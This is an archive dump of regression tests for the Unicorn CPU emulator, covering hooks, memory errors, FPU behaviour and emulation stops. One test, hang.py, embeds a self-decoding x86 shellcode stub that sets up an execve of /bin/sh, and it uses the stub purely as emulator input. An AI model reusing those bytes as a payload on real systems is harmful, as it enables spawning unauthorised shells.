%"PRIx64"\n", address); uc_emu_stop(uc); } } int main(int argc, char **argv, char **envp) { uc_engine *uc; uc_err err; uc_hook hhc; uint32_t val; // Initialize emulator in MIPS 32bit little endian mode printf("uc_open()\n"); err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return err; } // map in a page of mem printf("uc_mem_map()\n"); err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return err; } // write machine code to be emulated to memory printf("uc_mem_write()\n"); err = uc_mem_write(uc, addr, test_code, sizeof(test_code)); if( err ) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return err; } // hook all instructions by having @begin > @end printf("uc_hook_add()\n"); uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); if( err ) { printf("Failed on uc_hook_add(code) with error returned: %u\n", err); return err; } // start executing code printf("uc_emu_start()\n"); uc_emu_start(uc, addr, addr+sizeof(test_code), 0, 0); // done executing, print some reg values as a test uc_reg_read(uc, UC_MIPS_REG_PC, &val); printf("pc is %X\n", val); test_passed_ok = val == 0x100008; // free resources printf("uc_close()\n"); uc_close(uc); if( test_passed_ok ) printf("\n\nTEST PASSED!\n\n"); else printf("\n\nTEST FAILED!\n\n"); return 0; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/emu_stop_segfault.py����������������������������������������������������0000775�0000000�0000000�00000001050�14675241067�0022116�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python """See https://github.com/unicorn-engine/unicorn/issues/65""" import unicorn import regress class EmuStopSegFault(regress.RegressTest): def runTest(self): ADDR = 0x10101000 mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) mu.mem_map(ADDR, 1024 * 4) mu.mem_write(ADDR, b'\x41') mu.emu_start(ADDR, ADDR + 1, count=1) # The following should not 
trigger a null pointer dereference self.assertEqual(None, mu.emu_stop()) if __name__ == '__main__': regress.main() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/ensure_typedef_consts_generated.py��������������������������������������0000775�0000000�0000000�00000000620�14675241067�0025023�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python """See https://github.com/unicorn-engine/unicorn/issues/161 Ensure that constants which are specified via a typedef, rather than an enum, are included in the bindings by the script for autogenerating mappings for constants. """ import unicorn try: unicorn.UC_HOOK_MEM_UNMAPPED except AttributeError: assert(False and "Definition for UC_HOOK_MEM_UNMAPPED not generated") ����������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/fpu_ip.py���������������������������������������������������������������0000775�0000000�0000000�00000003446�14675241067�0017666�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * from capstone import * import regress ESP = 0x2000 PAGE_SIZE = 2 * 1024 * 1024 # mov [esp], DWORD 0x37f # fldcw [esp] # fnop # fnstenv [esp + 8] # pop ecx CODE = b'\xc7\x04\x24\x7f\x03\x00\x00\xd9\x2c\x24\xd9\xd0\xd9\x74\x24\x08\x59' class SimpleEngine: def __init__(self): self.capmd = Cs(CS_ARCH_X86, CS_MODE_32) def disas_single(self, data): for i in self.capmd.disasm(data, 16): print("\t%s\t%s" % (i.mnemonic, i.op_str)) break disasm = SimpleEngine() def hook_code(uc, addr, size, user_data): mem = uc.mem_read(addr, size) print(" 0x%X:" % (addr)), disasm.disas_single(bytes(mem)) class FpuIP(regress.RegressTest): def mem_reader(self, mu, addr, size, expected): tmp = mu.mem_read(addr, size) for out, exp in zip(tmp, expected): self.assertEqual(exp, out) def test_32(self): mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0x0, PAGE_SIZE) mu.mem_write(0x4000, CODE) mu.reg_write(UC_X86_REG_ESP, ESP) mu.hook_add(UC_HOOK_CODE, hook_code) mu.emu_start(0x4000, 0, 0, 5) esp = mu.reg_read(UC_X86_REG_ESP) self.assertEqual(0x2004, esp) expected = [0x0, 0x0, 0xa, 0x40] self.mem_reader(mu, esp + 14, 4, expected) def test_64(self): mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0x0, PAGE_SIZE) mu.mem_write(0x4000, CODE) mu.reg_write(UC_X86_REG_ESP, ESP) mu.hook_add(UC_HOOK_CODE, hook_code) mu.emu_start(0x4000, 0, 0, 5) rsp = mu.reg_read(UC_X86_REG_RSP) 
self.assertEqual(0x2012, rsp + 10) expected = [0x0, 0x0, 0xa, 0x40, 0x0, 0x0, 0x0, 0x0] self.mem_reader(mu, rsp + 10, 4, expected) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/fpu_mem_write.py��������������������������������������������������������0000775�0000000�0000000�00000001727�14675241067�0021246�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * import regress ESP = 0x2000 PAGE_SIZE = 1 * 1024 * 1024 # wait # fnstcw word ptr [esp] # pop ecx CODE = b'\x9B\xD9\x3C\x24\x59' def hook_mem_write(uc, access, address, size, value, user_data): print("mem WRITE: 0x%x, data size = %u, data value = 0x%x" % (address, size, value)) return True class FpuWrite(regress.RegressTest): def mem_reader(self, mu, addr, size, expected): tmp = mu.mem_read(addr, size) for i, e in zip(tmp, expected): self.assertEquals(e, i) def runTest(self): mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0, PAGE_SIZE) mu.mem_write(0, CODE) mu.reg_write(UC_X86_REG_ESP, ESP) mu.hook_add(UC_HOOK_MEM_WRITE, hook_mem_write) mu.emu_start(0x0, 5, 0, 2) esp = mu.reg_read(UC_X86_REG_ESP) self.mem_reader(mu, esp, 10, [0] * 10) if __name__ == '__main__': regress.main() �����������������������������������������unicorn-2.1.1/tests/regress/hang.py�����������������������������������������������������������������0000775�0000000�0000000�00000003343�14675241067�0017315�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from __future__ import print_function from unicorn import * from unicorn.x86_const import * import regress # callback for tracing instructions def hook_code(uc, address, size, user_data): tmp = uc.mem_read(address, size) print("[0x%x] =" %(address), end="") for i in tmp: print(" %02x" %i, end="") print("") # callback for tracing Linux interrupt def hook_intr(uc, intno, user_data): # only handle Linux syscall rip = uc.reg_read(UC_X86_REG_RIP) if intno != 0x80: print("=== 0x%x: got interrupt %x, quit" %(rip, intno)) uc.emu_stop() return eax = uc.reg_read(UC_X86_REG_EAX) print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(rip, intno, eax)) class Hang(regress.RegressTest): def runTest(self): binary1 = b'\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41\x41\x41\x41\x41' mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0, 2 * 1024 * 1024) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # handle interrupt ourself mu.hook_add(UC_HOOK_INTR, hook_intr) # setup stack 
        mu.reg_write(UC_X86_REG_RSP, 1024 * 1024)

        # fill in memory with 0xCC (software breakpoint int 3)
        for i in range(1 * 1024):
            mu.mem_write(0 + i, b'\xcc')

        # write machine code to be emulated to memory
        mu.mem_write(0, binary1)

        self.assertEqual(mu.emu_start(0, len(binary1)), None)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/hook_add_crash.py

#!/usr/bin/env python
"""https://github.com/unicorn-engine/unicorn/issues/165"""

import unicorn

def hook_mem_read_unmapped(mu, access, address, size, value, user_data):
    pass

mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32)

try:
    for x in range(0, 1000):
        mu.hook_add(unicorn.UC_HOOK_MEM_READ_UNMAPPED, hook_mem_read_unmapped, None)
except unicorn.UcError as e:
    print("ERROR: %s" % e)

unicorn-2.1.1/tests/regress/hook_code_add_del.py

#!/usr/bin/python
'''https://github.com/unicorn-engine/unicorn/issues/334'''

from __future__ import print_function
import regress
from unicorn import *
from unicorn.x86_const import *

ADDRESS = 0x8048000
STACK_ADDRESS = 0xffff000
STACK_SIZE = 4096

'''
31 DB    xor ebx, ebx
53       push ebx
43       inc ebx
53       push ebx
6A 02    push 2
6A 66    push 66h
58       pop eax
89 E1    mov ecx, esp
CD 80    int 80h
'''
CODE = b"\x31\xDB\x53\x43\x53\x6A\x02\x6A\x66\x58\x89\xE1\xCD\x80"
EP = ADDRESS + 0x54

def hook_code(mu, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = %u" % (address, size))

class HookCodeAddDelTest(regress.RegressTest):
    def runTest(self):
        emu = Uc(UC_ARCH_X86, UC_MODE_32)
        emu.mem_map(ADDRESS, 0x1000)
        emu.mem_write(EP, CODE)
        emu.mem_map(STACK_ADDRESS, STACK_SIZE)
        emu.reg_write(UC_X86_REG_ESP, STACK_ADDRESS + STACK_SIZE)

        # UC_HOOK_CODE hook will work even after deletion (the bug in issue #334)
        i = emu.hook_add(UC_HOOK_CODE, hook_code, None)
        emu.hook_del(i)

        emu.emu_start(EP, EP + len(CODE), count=3)
        print("EIP: 0x%x" % emu.reg_read(UC_X86_REG_EIP))

if __name__ == '__main__':
    regress.main()
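A quick sketch of the contract the test above pins down, assuming only the public Python bindings (Uc, hook_add, hook_del): hook_add returns a handle, and once hook_del consumes it the callback should never fire again. The addresses, NOP payload, and the fired list below are illustrative, not part of the test suite.

    from unicorn import Uc, UC_ARCH_X86, UC_MODE_32, UC_HOOK_CODE

    fired = []
    uc = Uc(UC_ARCH_X86, UC_MODE_32)
    uc.mem_map(0x1000, 0x1000)
    uc.mem_write(0x1000, b'\x90\x90\x90')  # three NOPs
    handle = uc.hook_add(UC_HOOK_CODE, lambda u, a, s, d: fired.append(a))
    uc.hook_del(handle)  # delete the hook before emulating
    uc.emu_start(0x1000, 0x1003)
    assert fired == []   # a deleted hook must not fire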
unicorn-2.1.1/tests/regress/hook_code_stop_emu.py

#!/usr/bin/python
from __future__ import print_function
import binascii
import regress
from unicorn import *
from unicorn.x86_const import *

CODE = binascii.unhexlify(b"".join([
    b"48c7c003000000",  # mov rax, 3       mapped: 0x1000
    b"0f05",            # syscall          mapped: 0x1007
    b"48c7c700400000",  # mov rdi, 0x4000  mapped: 0x1009
    b"488907",          # mov [rdi], rdx   mapped: 0x1010
    b"488b07",          # mov rdx, [rdi]   mapped: 0x1013
    b"4883c201",        # add rdx, 1       mapped: 0x1016
]))

class SingleStepper:
    def __init__(self, emu, test):
        self._emu = emu
        self._hit_count = 0
        self._test = test

    def _stop_hook(self, uc, address, *args, **kwargs):
        if self._hit_count == 0:
            self._hit_count += 1
        else:
            self._test.assertEqual(1, self._hit_count, "HOOK_CODE invoked too many times")
            uc.emu_stop()

    def step(self):
        self._hit_count = 0
        h = self._emu.hook_add(UC_HOOK_CODE, self._stop_hook)
        try:
            pc = self._emu.reg_read(UC_X86_REG_RIP)
            self._emu.emu_start(pc, pc + 0x20)
        finally:
            self._emu.hook_del(h)

def showpc(mu):
    pc = mu.reg_read(UC_X86_REG_RIP)
    print("pc: 0x%x" % pc)

class HookCodeStopEmuTest(regress.RegressTest):
    def test_hook_code_stop_emu(self):
        try:
            mu = Uc(UC_ARCH_X86, UC_MODE_64)

            # base of CODE
            mu.mem_map(0x1000, 0x1000)
            mu.mem_write(0x1000, CODE)

            # scratch, used by CODE
            mu.mem_map(0x4000, 0x1000)

            mu.reg_write(UC_X86_REG_RDX, 0x1)
            mu.reg_write(UC_X86_REG_RIP, 0x1000)

            # 0x1000: 48c7c003000000  mov rax, 3
            # 0x1007: 0f05            syscall
            # 0x1009: 48c7c700400000  mov rdi, 0x4000
            # 0x1010: 488907          mov [rdi], rdx
            # 0x1013: 488b07          mov rdx, [rdi]
            # 0x1016: 4883c201        add rdx, 1

            stepper = SingleStepper(mu, self)
            showpc(mu)
            self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_RIP), "Unexpected PC")

            stepper.step()
            showpc(mu)
            self.assertEqual(0x1007, mu.reg_read(UC_X86_REG_RIP),
                             "Emulator failed to stop after one instruction")

            stepper.step()
            showpc(mu)
            self.assertEqual(0x1009, mu.reg_read(UC_X86_REG_RIP),
                             "Emulator failed to stop after one instruction")
        except UcError as e:
            self.assertFalse(0, "ERROR: %s" % e)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/hook_extrainvoke.c

#include <stdlib.h>
#include <stdio.h>
#include <unicorn/unicorn.h>
#define X86_CODE32 "\xf3\xab" // rep stosd dword ptr es:[edi], eax -> Fill (E)CX doublewords at ES:[(E)DI] with EAX
#define ADDRESS 0x1000000
#define ECX_OPS 2

static long unsigned int hook_called = 0;

void hook_ins(uc_engine *uc, uint64_t address, uint32_t size, void *user_data)
{
    hook_called++;
    printf("hook called\n");
}

static void VM_exec(void)
{
    uc_engine *uc;
    uc_err err;
    uc_hook trace;
    unsigned int r_eax, eflags, r_esp, r_edi, r_ecx;

    r_eax = 0xbaadbabe;
    r_esp = ADDRESS + 0x20;
    r_edi = ADDRESS + 0x300; // some safe distance from main code.
    eflags = 0x00000206;
    r_ecx = ECX_OPS;

    // Initialize emulator in X86-32bit mode
    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err));
        return;
    }

    err = uc_mem_map(uc, ADDRESS, (2 * 1024 * 1024), UC_PROT_ALL);
    if (err != UC_ERR_OK) {
        printf("Failed to map memory %s\n", uc_strerror(err));
        return;
    }

    // write machine code to be emulated to memory
    err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1);
    if (err != UC_ERR_OK) {
        printf("Failed to write emulation code to memory, quit!: %s(len %lu)\n",
               uc_strerror(err), (unsigned long)sizeof(X86_CODE32) - 1);
        return;
    }

    // initialize machine registers
    uc_reg_write(uc, UC_X86_REG_EAX, &r_eax);
    uc_reg_write(uc, UC_X86_REG_EDI, &r_edi);
    uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx);
    uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); // make stack pointer point to already mapped memory so we don't need to hook.
    uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags);

    uc_hook_add(uc, &trace, UC_HOOK_CODE, (void *)hook_ins, NULL, 1, 0);

    // emulate machine code in infinite time
    err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0);
    if (err) {
        printf("Failed on uc_emu_start() with error returned %u: %s\n",
               err, uc_strerror(err));
        uc_close(uc);
        return;
    }

    uc_reg_read(uc, UC_X86_REG_EAX, &r_eax);
    uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx);
    uc_reg_read(uc, UC_X86_REG_EDI, &r_edi);
    uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags);

    uc_close(uc);

    printf("\n>>> Emulation done. Below is the CPU context\n");
    printf(">>> EAX = 0x%08X\n", r_eax);
    printf(">>> ECX = 0x%08X\n", r_ecx);
    printf(">>> EDI = 0x%08X\n", r_edi);
    printf(">>> EFLAGS = 0x%08X\n", eflags);

    printf("\nHook called %lu times. Test %s\n", hook_called,
           (hook_called == ECX_OPS ? "PASSED!!"
: "FAILED!!!")); } int main(int argc, char *argv[]) { VM_exec(); return 0; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/hook_raises_exception.py������������������������������������������������0000664�0000000�0000000�00000002200�14675241067�0022750�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������import regress from unicorn import Uc, UC_ARCH_X86, UC_MODE_64, UC_HOOK_CODE CODE = b"\x90" * 3 CODE_ADDR = 0x1000 class HookCounter(object): """Counts number of hook calls.""" def __init__(self): self.hook_calls = 0 def bad_code_hook(self, uc, address, size, data): self.hook_calls += 1 raise ValueError("Something went wrong") def good_code_hook(self, uc, address, size, data): self.hook_calls += 1 class TestExceptionInHook(regress.RegressTest): def test_exception_in_hook(self): uc = Uc(UC_ARCH_X86, UC_MODE_64) uc.mem_map(CODE_ADDR, 0x1000) uc.mem_write(CODE_ADDR, CODE) counter = HookCounter() uc.hook_add(UC_HOOK_CODE, counter.good_code_hook, begin=CODE_ADDR, end=CODE_ADDR + len(CODE)) uc.hook_add(UC_HOOK_CODE, counter.bad_code_hook, begin=CODE_ADDR, end=CODE_ADDR + len(CODE)) self.assertRaises(ValueError, uc.emu_start, CODE_ADDR, CODE_ADDR + len(CODE)) # Make sure hooks calls finish before raising (hook_calls == 2) self.assertEqual(counter.hook_calls, 2) if __name__ == "__main__": regress.main() ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/hook_readonly_write_local.py��������������������������������������������0000775�0000000�0000000�00000001372�14675241067�0023621�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * import regress PAGE_SIZE = 4 * 1024 ACCESS_ADDR = 0x1000 # mov eax, [0x1000] # mov eax, [0x1000] CODE = b'\xA1\x00\x10\x00\x00\xA1\x00\x10\x00\x00' def hook_mem_read(uc, access, address, size, value, data): print("Reading at " + str(address)) uc.mem_write(address, CODE) class REP(regress.RegressTest): def test_rep(self): mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0, PAGE_SIZE) mu.mem_write(0, CODE) mu.mem_map(ACCESS_ADDR, PAGE_SIZE, UC_PROT_READ) mu.hook_add(UC_HOOK_MEM_READ, hook_mem_read, begin = ACCESS_ADDR, end = ACCESS_ADDR + PAGE_SIZE) mu.emu_start(0, len(CODE)) if __name__ == '__main__': regress.main() 
unicorn-2.1.1/tests/regress/init.py

#!/usr/bin/python
# By Mariano Graziano

from unicorn import *
from unicorn.x86_const import *

import regress, struct

mu = 0

class Init(regress.RegressTest):
    def init_unicorn(self, ip, sp, counter):
        global mu
        #print("[+] Emulating IP: %x SP: %x - Counter: %x" % (ip, sp, counter))
        mu = Uc(UC_ARCH_X86, UC_MODE_64)
        mu.mem_map(0x1000000, 2 * 1024 * 1024)
        mu.mem_write(0x1000000, b"\x90")
        mu.mem_map(0x8000000, 8 * 1024 * 1024)
        mu.reg_write(UC_X86_REG_RSP, sp)
        content = self.generate_value(counter)
        mu.mem_write(sp, content)
        self.set_hooks()

    def generate_value(self, counter):
        start = 0xffff880026f02000
        offset = counter * 8
        address = start + offset
        return struct.pack("<Q", address)

    def set_hooks(self):
        global mu
        mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, self.hook_mem_invalid)
        mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED, self.hook_mem_fetch_unmapped)

    def hook_mem_invalid(self, uc, access, address, size, value, user_data):
        global mu
        print("[ HOOK_MEM_INVALID - Address: %s ]" % hex(address))
        if access == UC_MEM_WRITE_UNMAPPED:
            print(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" % (address, size, value))
            address_page = address & 0xFFFFFFFFFFFFF000
            mu.mem_map(address_page, 2 * 1024 * 1024)
            mu.mem_write(address, str(value).encode())
            return True
        else:
            return False

    def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data):
        global mu
        print("[ HOOK_MEM_FETCH - Address: %s ]" % hex(address))
        print("[ mem_fetch_unmapped: faulting address at %s ]" % hex(address))
        mu.mem_write(0x1000003, b"\x90")
        mu.reg_write(UC_X86_REG_RIP, 0x1000001)
        return True

    def runTest(self):
        global mu
        ips = list(range(0x1000000, 0x1001000, 0x1))
        sps = list(range(0x8000000, 0x8001000, 0x1))
        j = 0
        for i in ips:
            j += 1
            index = ips.index(i)
            self.init_unicorn(i, sps[index], j)
            mu.emu_start(0x1000000, 0x1000000 + 0x1)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/invalid_read_in_cpu_tb_exec.c

#include <unicorn/unicorn.h>

static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data)
{
    printf("hook_block(%p, %"PRIx64", %d, %p)\n", uc, address, size, user_data);
}

/*
 * Disassembly according to capstone:
 *   add byte ptr [rip - 1], 0x30
 *   jmp 0x1000000
 */
#define BINARY "\x80\x05\xff\xff\xff\xff\x30\xeb\xf7\x30"
#define MEMORY_SIZE 2 * 1024 * 1024
#define STARTING_ADDRESS 0x1000000

int main(int argc, char **argv, char **envp)
{
    uc_engine *uc;
    if (uc_open(UC_ARCH_X86, UC_MODE_64, &uc)) {
        printf("uc_open(…) failed\n");
        return 1;
    }
    uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL);
    if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) {
        printf("uc_mem_write(…) failed\n");
        return 1;
    }
    uc_hook hook;
    uc_hook_add(uc, &hook, UC_HOOK_BLOCK, hook_block, NULL, 1, 0);
    printf("uc_emu_start(…)\n");
    uc_emu_start(uc, STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20);
    printf("done\n");
    return 0;
}

unicorn-2.1.1/tests/regress/invalid_read_in_tb_flush_x86_64.c

#include <unicorn/unicorn.h>

#define HARDWARE_ARCHITECTURE UC_ARCH_X86
#define HARDWARE_MODE UC_MODE_64
#define MEMORY_STARTING_ADDRESS 0x1000000
#define MEMORY_SIZE 2 * 1024 * 1024
#define MEMORY_PERMISSIONS UC_PROT_READ
#define BINARY_CODE "\x90"

int main(int argc, char **argv, char **envp)
{
    uc_engine *uc;
    if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) {
        printf("uc_open(…) failed\n");
        return 1;
    }
    uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS);
    if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) {
        printf("uc_mem_write(…) failed\n");
        return 1;
    }
    printf("uc_emu_start(…)\n");
    uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 20);
    printf("done\n");
    return 0;
}

unicorn-2.1.1/tests/regress/invalid_write.py

#!/usr/bin/env python
# Test callback that returns False to cancel emulation

from __future__ import print_function
from unicorn import *
from unicorn.x86_const import *
import regress

X86_CODE32_MEM_WRITE = b"\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a"  # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx

# callback for tracing invalid memory access (READ or WRITE)
def hook_mem_invalid(uc, access, address, size, value, user_data):
    return False

class InvalidWrite(regress.RegressTest):
    def test(self):
        # Initialize emulator in X86-32bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_32)

        # memory address where emulation starts
        ADDRESS = 0x1000000

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE)

        # initialize machine registers
        mu.reg_write(UC_X86_REG_ECX, 0x1234)
        mu.reg_write(UC_X86_REG_EDX, 0x7890)

        # intercept invalid memory events
        mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, hook_mem_invalid)

        try:
            # emulation should return with error UC_ERR_WRITE_UNMAPPED
            mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_MEM_WRITE))
        except UcError as e:
            self.assertEqual(e.errno, UC_ERR_WRITE_UNMAPPED)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/invalid_write_in_cpu_tb_exec_x86_64.c

#include <unicorn/unicorn.h>

/*
 * Disassembly according to capstone:
 *   mulx rsp, rsp, rdx
 */
#define BINARY "\xc4\xe2\xdb\xf6\xe2"
#define MEMORY_SIZE 2 * 1024 * 1024
#define STARTING_ADDRESS 0x1000000

int main(int argc, char **argv, char **envp)
{
    uc_engine *uc;
    if (uc_open(UC_ARCH_X86, UC_MODE_64, &uc)) {
        printf("uc_open(…) failed\n");
        return 1;
    }
    uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL);
    if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) {
        printf("uc_mem_write(…) failed\n");
        return 1;
    }
    printf("uc_emu_start(…)\n");
    uc_emu_start(uc, STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20);
    printf("done\n");
    return 0;
}

unicorn-2.1.1/tests/regress/jmp_ebx_hang.py

#!/usr/bin/env python
"""See https://github.com/unicorn-engine/unicorn/issues/82"""

import unicorn
from unicorn import *
import regress

CODE_ADDR = 0x10101000
CODE = b'\xff\xe3'  # jmp ebx

class JumpEbxHang(regress.RegressTest):
    def runTest(self):
        mu = unicorn.Uc(UC_ARCH_X86, UC_MODE_32)
        mu.mem_map(CODE_ADDR, 1024 * 4)
        mu.mem_write(CODE_ADDR, CODE)

        # If EBX is zero then an exception is raised, as expected
        mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, 0x0)

        print(">>> jmp ebx (ebx = 0)")
        with self.assertRaises(UcError) as m:
            mu.emu_start(CODE_ADDR, CODE_ADDR + 2, count=1)
        self.assertEqual(m.exception.errno, UC_ERR_FETCH_UNMAPPED)

        print(">>> jmp ebx (ebx = 0xaa96a47f)")
        mu = unicorn.Uc(UC_ARCH_X86, UC_MODE_32)
        mu.mem_map(CODE_ADDR, 1024 * 4)

        # If we write this address to EBX then the emulator hangs on emu_start
        mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, 0xaa96a47f)
        mu.mem_write(CODE_ADDR, CODE)
        with self.assertRaises(UcError) as m:
            mu.emu_start(CODE_ADDR, CODE_ADDR + 2, count=1)
        self.assertEqual(m.exception.errno, UC_ERR_FETCH_UNMAPPED)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/jumping.py

#!/usr/bin/env python
# Mariano Graziano

from unicorn import *
from unicorn.x86_const import *

import regress

#echo -ne "\x48\x31\xc0\x48\xb8\x04\x00\x00\x00\x00\x00\x00\x00\x48\x3d\x05\x00\x00\x00\x74\x05\xe9\x0f\x00\x00\x00\x48\xba\xbe\xba\x00\x00\x00\x00\x00\x00\xe9\x0f\x00\x00\x00\x48\xba\xca\xc0\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x90" | ndisasm - -b64
#00000000  4831C0            xor rax,rax
#00000003  48B8040000000000  mov rax,0x4
#                            -0000
#0000000D  483D05000000      cmp rax,0x5
#00000013  7405              jz 0x1a
#00000015  E90F000000        jmp qword 0x29
#0000001A  48BABEBA00000000  mov rdx,0xbabe
#                            -0000
#00000024  E90F000000        jmp qword 0x38
#00000029  48BACAC000000000  mov rdx,0xc0ca
#                            -0000
#00000033  E900000000        jmp qword 0x38
#00000038  90                nop

mu = 0
zf = 1  # (0:clear, 1:set)

class Init(regress.RegressTest):
    def clear_zf(self):
        eflags_cur = mu.reg_read(UC_X86_REG_EFLAGS)
        eflags = eflags_cur & ~(1 << 6)
        #eflags = 0x0
        print("[clear_zf] - eflags from %x to %x" % (eflags_cur, eflags))
        if eflags != eflags_cur:
            print("[clear_zf] - writing new eflags...")
            mu.reg_write(UC_X86_REG_EFLAGS, eflags)

    def set_zf(self):
        eflags_cur = mu.reg_read(UC_X86_REG_EFLAGS)
        eflags = eflags_cur | (1 << 6)
        #eflags = 0xFFFFFFFF
        print("[set_zf] - eflags from %x to %x" % (eflags_cur, eflags))
        if eflags != eflags_cur:
            print("[set_zf] - writing new eflags...")
            mu.reg_write(UC_X86_REG_EFLAGS, eflags)

    def handle_zf(self, zf):
        print("[handle_zf] - eflags", zf)
        if zf == 0:
            self.clear_zf()
        else:
            self.set_zf()

    def multipath(self):
        print("[multipath] - handling ZF (%s) - default" % zf)
        self.handle_zf(zf)

    # callback for tracing basic blocks
    def hook_block(self, uc, address, size, user_data):
        print(">>> Tracing basic block at 0x%x, block size = 0x%x" % (address, size))

    # callback for tracing instructions
    def hook_code(self, uc, address, size, user_data):
        print(">>> Tracing instruction at 0x%x, instruction size = %u" % (address, size))
        rax = mu.reg_read(UC_X86_REG_RAX)
        rbx = mu.reg_read(UC_X86_REG_RBX)
        rcx = mu.reg_read(UC_X86_REG_RCX)
        rdx = mu.reg_read(UC_X86_REG_RDX)
        rsi = mu.reg_read(UC_X86_REG_RSI)
